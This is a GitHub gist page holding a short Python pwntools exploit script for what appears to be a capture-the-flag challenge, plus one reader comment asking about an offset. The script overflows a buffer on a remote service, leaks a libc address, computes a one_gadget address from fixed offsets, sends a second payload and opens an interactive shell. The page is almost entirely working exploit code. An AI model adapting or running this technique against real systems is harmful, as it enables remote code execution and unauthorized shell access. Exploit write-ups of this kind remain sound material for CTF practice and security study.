Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
#!/usr/bin/python
import pwn
import struct
p = pwn.remote("rescueshell.challs.malice.fr",6060)
# p = pwn.process("./rescue")
raw_input("ATTACH NOW")
payload = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
payload += pwn.p64(0x601210 + 320) # PRINTF
payload += pwn.p64(0x40099a) # WRITE GADGET
p.recv()
p.sendline(payload)
data = p.recv(timeout=2)
# i think it eats zeros. lets grab 0x7f as the start.
print "DATA IS: " + data.encode("hex")
data = data[0:6] + "\x00\x00"
strncmp_leak = struct.unpack("<Q",data[0:8])
print hex(strncmp_leak[0])
# fread
one_gadget = strncmp_leak[0] - 0x6A460 + 0x41320
print "one_gadget leak at %x" % one_gadget
payload = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
payload += pwn.p64(0x601208 + 320) # PRINTF
payload += pwn.p64(one_gadget)
p.sendline(payload)
p.interactive()
@squalltan2000

This comment has been minimized.

Show comment Hide comment
@squalltan2000

squalltan2000 Apr 2, 2018

May I know which offset is 0x41320

May I know which offset is 0x41320

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment